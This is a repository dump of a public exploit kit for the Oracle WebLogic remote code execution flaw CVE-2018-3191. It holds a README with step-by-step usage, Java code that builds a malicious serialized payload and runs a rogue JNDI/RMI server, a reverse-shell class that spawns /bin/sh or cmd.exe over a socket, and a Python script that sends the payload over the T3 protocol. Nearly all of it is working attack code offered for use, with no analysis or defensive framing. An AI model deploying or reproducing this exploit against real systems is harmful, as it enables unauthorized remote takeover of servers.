├── .DS_Store ├── GenPayload.jar ├── README.md ├── RMISERVER.jar ├── out ├── artifacts │ └── WeblogicSpringJdni_jar │ │ └── WeblogicSpringJdni.jar └── production │ └── WeblogicSpringJdni │ ├── GenSpringJdniPayload.class │ ├── JNDIServer.class │ ├── LoadObject.class │ ├── META-INF │ └── MANIFEST.MF │ └── StreamConnector.class ├── src ├── GenSpringJdniPayload.java ├── JNDIServer.java ├── LoadObject.java ├── META-INF │ └── MANIFEST.MF └── StreamConnector.java └── weblogic.py /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mackleadmire/CVE-2018-3191-Rce-Exploit/090c21baf90406cbf2b7f1a944a92a8b1b49afa7/.DS_Store -------------------------------------------------------------------------------- /GenPayload.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mackleadmire/CVE-2018-3191-Rce-Exploit/090c21baf90406cbf2b7f1a944a92a8b1b49afa7/GenPayload.jar -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-3191-Rce-Exploit 2 | 3 | ## Author: Break 4 | 5 | ## Step 1: java -jar GenPayload.java output SJpayload.bin, Address is RMI Server address 6 | 7 | ## Step 2:java -jar RMISERVER.jar httpaddress, RMI server listening on port 1099 and load remote Reverse classes on web server 8 | 9 | ## Step 3:put two files(reverse shell) LoadObject.class and StreamConnection.class on http server and can be visited by url 10 | 11 | ## Step 4: nc -llp 2222 12 | 13 | ## Step 5: python weblogic.py weblogicAddress 7001 SJpayload 14 | 15 | ## Step 6: wait for a reverse shell, good luck 16 | 17 | -------------------------------------------------------------------------------- /RMISERVER.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mackleadmire/CVE-2018-3191-Rce-Exploit/090c21baf90406cbf2b7f1a944a92a8b1b49afa7/RMISERVER.jar -------------------------------------------------------------------------------- /out/artifacts/WeblogicSpringJdni_jar/WeblogicSpringJdni.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mackleadmire/CVE-2018-3191-Rce-Exploit/090c21baf90406cbf2b7f1a944a92a8b1b49afa7/out/artifacts/WeblogicSpringJdni_jar/WeblogicSpringJdni.jar -------------------------------------------------------------------------------- /out/production/WeblogicSpringJdni/GenSpringJdniPayload.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mackleadmire/CVE-2018-3191-Rce-Exploit/090c21baf90406cbf2b7f1a944a92a8b1b49afa7/out/production/WeblogicSpringJdni/GenSpringJdniPayload.class -------------------------------------------------------------------------------- /out/production/WeblogicSpringJdni/JNDIServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mackleadmire/CVE-2018-3191-Rce-Exploit/090c21baf90406cbf2b7f1a944a92a8b1b49afa7/out/production/WeblogicSpringJdni/JNDIServer.class -------------------------------------------------------------------------------- /out/production/WeblogicSpringJdni/LoadObject.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mackleadmire/CVE-2018-3191-Rce-Exploit/090c21baf90406cbf2b7f1a944a92a8b1b49afa7/out/production/WeblogicSpringJdni/LoadObject.class -------------------------------------------------------------------------------- /out/production/WeblogicSpringJdni/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: JNDIServer 3 | 4 | -------------------------------------------------------------------------------- /out/production/WeblogicSpringJdni/StreamConnector.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mackleadmire/CVE-2018-3191-Rce-Exploit/090c21baf90406cbf2b7f1a944a92a8b1b49afa7/out/production/WeblogicSpringJdni/StreamConnector.class -------------------------------------------------------------------------------- /src/GenSpringJdniPayload.java: -------------------------------------------------------------------------------- 1 | import com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager; 2 | 3 | import java.io.*; 4 | 5 | public class GenSpringJdniPayload { 6 | 7 | 8 | 9 | 10 | 11 | public static void main(String[] args) { 12 | try { 13 | String jdniServerAddr = args[0]; 14 | String jdniAddr = "rmi://"+jdniServerAddr+":1099/LoadObject"; 15 | JtaTransactionManager object = new JtaTransactionManager(); 16 | object.setUserTransactionName(jdniAddr); 17 | File f = new File("SJpayload.bin"); 18 | ObjectOutputStream out2 = new ObjectOutputStream(new FileOutputStream(f)); 19 | out2.writeObject(object); 20 | out2.flush(); 21 | out2.close(); 22 | 23 | } catch (Exception var6) { 24 | var6.printStackTrace(); 25 | } 26 | 27 | } 28 | 29 | } 30 | -------------------------------------------------------------------------------- /src/JNDIServer.java: -------------------------------------------------------------------------------- 1 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 2 | 3 | import javax.naming.NamingException; 4 | import javax.naming.Reference; 5 | import java.rmi.AlreadyBoundException; 6 | import java.rmi.RemoteException; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | public class JNDIServer { 11 | 12 | public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { 13 | Registry registry = LocateRegistry.createRegistry(1099); 14 | String RhttpHost = args[0]; 15 | Reference reference = new Reference("LoadObject", 16 | "LoadObject","http://"+RhttpHost+"/"); 17 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); 18 | registry.bind("LoadObject",referenceWrapper); 19 | 20 | } 21 | } -------------------------------------------------------------------------------- /src/LoadObject.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.net.Socket; 3 | 4 | 5 | public class LoadObject { 6 | public LoadObject() throws IOException { 7 | 8 | // Runtime.getRuntime().exec("calc"); 9 | String ipport = "127.0.0.1"; 10 | 11 | try { 12 | String ShellPath; 13 | if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { 14 | ShellPath = new String("/bin/sh"); 15 | } else { 16 | ShellPath = new String("cmd.exe"); 17 | } 18 | 19 | Socket socket = new Socket("127.0.0.1", 2222); 20 | Process process = Runtime.getRuntime().exec(ShellPath); 21 | (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); 22 | (new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start(); 23 | (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); 24 | } catch (Exception var6) { 25 | var6.printStackTrace(); 26 | } 27 | 28 | } 29 | public static void main(String[] argv) throws IOException { 30 | LoadObject LoadObject = new LoadObject(); 31 | } 32 | 33 | 34 | } 35 | 36 | 37 | -------------------------------------------------------------------------------- /src/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: JNDIServer 3 | 4 | -------------------------------------------------------------------------------- /src/StreamConnector.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | 3 | class StreamConnector extends Thread { 4 | InputStream hx; 5 | OutputStream il; 6 | 7 | StreamConnector(InputStream hx, OutputStream il) { 8 | this.hx = hx; 9 | this.il = il; 10 | } 11 | 12 | public void run() { 13 | BufferedReader ar = null; 14 | BufferedWriter slm = null; 15 | 16 | try { 17 | ar = new BufferedReader(new InputStreamReader(this.hx)); 18 | slm = new BufferedWriter(new OutputStreamWriter(this.il)); 19 | char[] buffer = new char[8192]; 20 | 21 | int length; 22 | while((length = ar.read(buffer, 0, buffer.length)) > 0) { 23 | slm.write(buffer, 0, length); 24 | slm.flush(); 25 | } 26 | } catch (Exception var6) { 27 | ; 28 | } 29 | 30 | try { 31 | if (ar != null) { 32 | ar.close(); 33 | } 34 | 35 | if (slm != null) { 36 | slm.close(); 37 | } 38 | } catch (Exception var5) { 39 | ; 40 | } 41 | 42 | } 43 | } -------------------------------------------------------------------------------- /weblogic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | import struct 5 | import re 6 | import time 7 | 8 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | 10 | server_address = (sys.argv[1], int(sys.argv[2])) 11 | print 'connecting to %s port %s' % server_address 12 | sock.connect(server_address) 13 | 14 | # Send headers 15 | headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' 16 | print 'sending "%s"' % headers 17 | sock.sendall(headers) 18 | 19 | data = sock.recv(1024) 20 | print >>sys.stderr, 'received "%s"' % data 21 | 22 | payloadObj = open(sys.argv[3],'rb').read() 23 | 24 | payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' 25 | payload=payload+payloadObj 26 | payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' 27 | 28 | # adjust header for appropriate message length 29 | payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) 30 | 31 | print 'sending payload...' 32 | sock.send(payload) 33 | 34 | --------------------------------------------------------------------------------